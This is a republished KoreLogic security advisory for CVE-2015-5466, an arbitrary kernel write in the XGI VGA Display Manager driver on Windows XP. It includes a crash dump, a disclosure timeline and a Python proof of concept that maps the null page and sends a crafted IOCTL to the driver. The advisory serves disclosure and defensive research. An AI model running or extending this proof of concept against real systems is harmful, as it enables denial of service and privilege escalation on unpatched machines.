XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC

2015-09-01T00:00:00
ID 1337DAY-ID-24183
Type zdt
Reporter KoreLogic
Modified 2015-09-01T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt
 
 
1. Vulnerability Details
 
     Affected Vendor: Silicon Integrated Systems Corporation
     Affected Product: XGI VGA Display Manager
     Affected Version: 6.14.10.1090
     Platform: Microsoft Windows XP SP3
     CWE Classification: CWE-123: Write-what-where condition
     Impact: Arbitrary Code Execution
     Attack vector: IOCTL
     CVE-ID: CVE-2015-5466
 
2. Vulnerability Description
 
     A vulnerability within the xrvkp module allows an attacker
     to inject memory they control into an arbitrary location they
     define. This vulnerability can be used to overwrite function
     pointers in HalDispatchTable resulting in an elevation of
     privilege.
 
3. Technical Description
 
     Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
     Product: WinNt, suite: TerminalServer SingleUserTS
     Built by: 2600.xpsp_sp3_qfe.101209-1646
     Machine Name:
     Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
 
 
*******************************************************************************
     *
           *
     *                        Bugcheck Analysis
           *
     *
           *
 
*******************************************************************************
 
     Use !analyze -v to get detailed debugging information.
     BugCheck 50, {ffff0000, 1, 804f3b76, 0}
     Probably caused by : xrvkp.sys ( xrvkp+6ec )
     Followup: MachineOwner
     ---------
 
     kd> kn
     Call stack:  # ChildEBP RetAddr
     00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b
     01 f63fda00 805405d4 nt!MmAccessFault+0x8e7
     02 f63fda00 804f3b76 nt!KiTrap0E+0xcc
     03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92
     04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3
     05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5
     06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
     07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b
     08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8
     09 f63fdc34 804ee129 xrvkp+0x6ec
     0a f63fdc44 80574e56 nt!IopfCallDriver+0x31
     0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
     0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7
     0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
     0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8
     0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
     10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
     11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
     12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
     13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
     14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
     15 0021f6c0 1e07bd9c _ctypes+0x54d8
     16 00000000 00000000 python27!PyObject_Call+0x4c
 
 
4. Mitigation and Remediation Recommendation
 
     No response from vendor; no remediation available.
 
5. Credit
 
     This vulnerability was discovered by Matt Bergin of KoreLogic
     Security, Inc.
 
6. Disclosure Timeline
 
     2015.05.14 - Initial contact; requested security contact.
     2015.05.18 - Second contact attempt.
     2015.05.25 - Third contact attempt.
     2015.07.02 - KoreLogic requests CVE from Mitre.
     2015.07.10 - Mitre issues CVE-2015-5466.
     2015.07.28 - 45 business days have elapsed since KoreLogic last
                  attempted to contact SiS without a response.
     2015.09.01 - Public disclosure.
 
7. Proof of Concept
 
     from sys import exit
     from ctypes import *
     NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
     WriteProcessMemory = windll.kernel32.WriteProcessMemory
     DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
     CreateFileA = windll.kernel32.CreateFileA
     CloseHandle = windll.kernel32.CloseHandle
     FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
     OPEN_EXISTING = 3
     NULL = None
 
     device = "xgikp"
     code = 0x96002404
     inlen = 0xe6b6
     outlen = 0x0
     inbuf = 0x1
     outbuf = 0xffff0000
     inBufMem = "\x90"*inlen
 
     def main():
        try:
            handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
            if (handle == -1):
                print "[-] error creating handle"
                exit(1)
        except Exception as e:
            print "[-] error creating handle"
            exit(1)
 
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
        WriteProcessMemory(-1,0x1,inBufMem,inlen,byref(c_int(0)))
 
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,0x1,inlen,outbuf,outlen)
        CloseHandle(handle)
        return False
 
     if __name__=="__main__":
        main()
 
 
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

#  0day.today [2018-01-03]  #